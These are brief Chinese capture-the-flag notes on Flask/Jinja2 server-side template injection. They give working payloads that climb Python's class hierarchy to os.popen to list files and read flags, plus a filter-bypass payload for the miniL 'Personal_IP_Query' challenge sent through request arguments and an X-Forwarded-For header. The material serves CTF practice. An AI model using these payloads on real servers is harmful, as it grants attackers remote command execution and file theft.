Web_python_template_injection
flask模版注入不會啊,只能面向搜索引擎,已經入土了
首先是推薦兩篇好文:
1.從零學習flask模板注入
(其實是從入門到入土,小白強推這篇)
2.Flask/Jinja2 SSTI && python 沙箱逃逸
3.服務端模板注入攻擊 (SSTI)之淺析
4.利用SSTI漏洞獲取服務器Shell
5.Python——flask漏洞探究
不管現在還懂不懂原理,有payload模版就模仿着肝吧!
1.測試是否有注入點
{{1+1}} 之類的,成功執行則說明有模版注入
接下來是多個wp…
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}
過程:
總的來說
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("要執行的語句").read()}}
miniL Personal_IP_Query
放dlwp防忘 畢竟是想了好久的題目
http://e0579dc296f4fa31220536d95e3b68b5.challenge.mini.lctf.online:1080/?class=__class__&mro=__mro__&subclasses=__subclasses__&init=__init__&globals=__globals__&popen=popen&cmd=cat /flag
X-Forwarded-For: {{ ()[request.args.class][request.args.mro][-1][request.args.subclasses]()[127][request.args.init][request.args.globals][request.args.popen](request.args.cmd).read() }}